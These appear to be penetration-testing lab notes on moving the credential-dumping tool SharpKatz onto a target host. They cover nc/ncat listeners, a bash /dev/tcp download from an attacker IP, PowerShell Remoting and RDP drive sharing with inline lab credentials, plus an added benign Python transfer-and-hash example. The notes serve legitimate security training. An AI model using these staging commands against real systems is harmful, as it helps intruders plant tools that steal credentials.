Misc

Netcat, ncat

Opening a port on the target:

  • Target: ncat -l -p 8000 --recv-only > SharpKatz.exe
  • PWNBOX: nc -q 0 192.168.49.128 8000 < SharpKatz.exe
  • OR: ncat --send-only 192.168.49.128 8000 < SharpKatz.exe

  • --send-only (ncat) closes the connection as soon as the SharpKatz file has been sent.
  • -q 0 (nc) also closes the connection once the file is sent, so the receiving side sees EOF and exits.

Opening a port on the PWNBOX:

  • PWNBOX: sudo nc -l -p 443 -q 0 < SharpKatz.exe
  • Target: nc 192.168.49.128 443 > SharpKatz.exe

OR using Ncat:

  • PWNBOX: sudo ncat -l -p 443 --send-only < SharpKatz.exe
  • Target: ncat 192.168.49.128 443 --recv-only > SharpKatz.exe

Using /dev/tcp:

  • Pwnbox: send the file using nc or ncat (listening on 443, as above).
  • Target: receive the file with bash's /dev/tcp device: cat < /dev/tcp/10.10.14.7/443 > SharpKatz.exe
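The nc/ncat and /dev/tcp exchanges above all depend on the same detail: the receiver has no length header, so it only stops writing when the sender closes its side (which is what --send-only and -q 0 do). The following Python sketch is an added example, not part of the original notes or of the ncat project; it reimplements that send-only/recv-only exchange over loopback and finishes with the sha256 comparison you would run on both ends to confirm the file arrived intact. The loopback address, the function names and the random sample payload are assumptions made for the example.

```python
import hashlib
import os
import socket
import tempfile
import threading

CHUNK = 65536


def receive_file(listen_sock, dest_path):
    """Accept one connection and write everything received to dest_path.

    Mirrors `ncat -l --recv-only > file`: there is no length header, so the
    only signal that the transfer is finished is the sender's EOF (FIN).
    """
    conn, _peer = listen_sock.accept()
    total = 0
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(CHUNK)
            if not chunk:  # b"" means the peer closed its write side
                break
            out.write(chunk)
            total += len(chunk)
    return total


def send_file(host, port, src_path):
    """Connect, stream the file, then half-close like `--send-only` / `-q 0`.

    Without the shutdown the receiver would sit waiting for more data, which is
    what happens with a plain `nc` that keeps its stdin open after the file.
    """
    sent = 0
    with socket.create_connection((host, port)) as sock, open(src_path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            sock.sendall(chunk)
            sent += len(chunk)
        sock.shutdown(socket.SHUT_WR)  # send FIN: no more data will follow
    return sent


def sha256_of(path):
    """Hash a file in chunks; compare this value on both ends after the transfer."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def transfer_and_verify(src_path, dest_path):
    """Run receiver and sender over loopback; return (hashes_match, bytes_sent)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    received = []  # the receiver thread records how many bytes it wrote
    worker = threading.Thread(
        target=lambda: received.append(receive_file(listener, dest_path)), daemon=True
    )
    worker.start()
    sent = send_file("127.0.0.1", port, src_path)
    worker.join(timeout=10)
    listener.close()

    ok = (
        not worker.is_alive()
        and received == [sent]
        and sha256_of(src_path) == sha256_of(dest_path)
    )
    return ok, sent


def demo(size=300_000):
    """Build a constructed sample payload, transfer it, and report the check."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "sample.bin")
        dst = os.path.join(tmp, "received.bin")
        with open(src, "wb") as f:
            f.write(os.urandom(size))  # constructed test data, not a real binary
        return transfer_and_verify(src, dst)


if __name__ == "__main__":
    matched, n = demo()
    print(f"{n} bytes transferred, sha256 {'matches' if matched else 'MISMATCH'}")
```

Comment out the `sock.shutdown(...)` line and run it again: the receiver never gets EOF and the join times out, which is the same hang you see when a plain `nc` sender is used without -q 0. The sha256 step is the habit worth keeping for any of the methods on this page: hash on the sending box, hash on the target, and only trust the file when they match.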


Powershell Session

  • When HTTP, HTTPS and SMB are unavailable for transferring files, we can use PowerShell Remoting (aka WinRM) instead.
  • It allows executing scripts and commands and transferring files on a remote computer.
  • Enabling PowerShell Remoting opens TCP/5985 for the HTTP listener and TCP/5986 for the HTTPS listener.
  • To create a PS Remoting session you need one of the following:
    • administrative access,
    • membership of the Remote Management Users group,
    • explicit permissions for PowerShell Remoting in the session configuration.

Commands:

  1. You have access to the host DC01 as an Administrator and have Admin rights on DATABASE01.
  2. Test-NetConnection -ComputerName DATABASE01 -Port 5985 - Confirm WinRM (TCP/5985) is reachable.
  3. $Session = New-PSSession -ComputerName DATABASE01
  4. Copy-Item -Path C:\samplefile.txt -ToSession $Session -Destination C:\Users\Administrator\Desktop\ - Copying a file from local to remote.
  5. Copy-Item -Path C:\samplefile.txt -FromSession $Session -Destination C:\Users\Administrator\Desktop\ - Copying a file from remote to local (-FromSession reverses the direction; the original note repeated -ToSession here).

RDP:

Windows:

  • You can right-click and copy files directly from the RDP session onto the Windows host.
  • To share a local folder with the session, open the Remote Desktop app, go to Local Resources and add the drive.

Linux: using rdesktop and xfreerdp

Pwnbox: we create a folder and share it into the session as a drive:

  • rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
  • xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer

Target: to access the directory, in the RDP session go to Network > \\tsclient\linux

Note: This drive is not accessible to any other users logged on to the target computer, even if they manage to hijack the RDP session.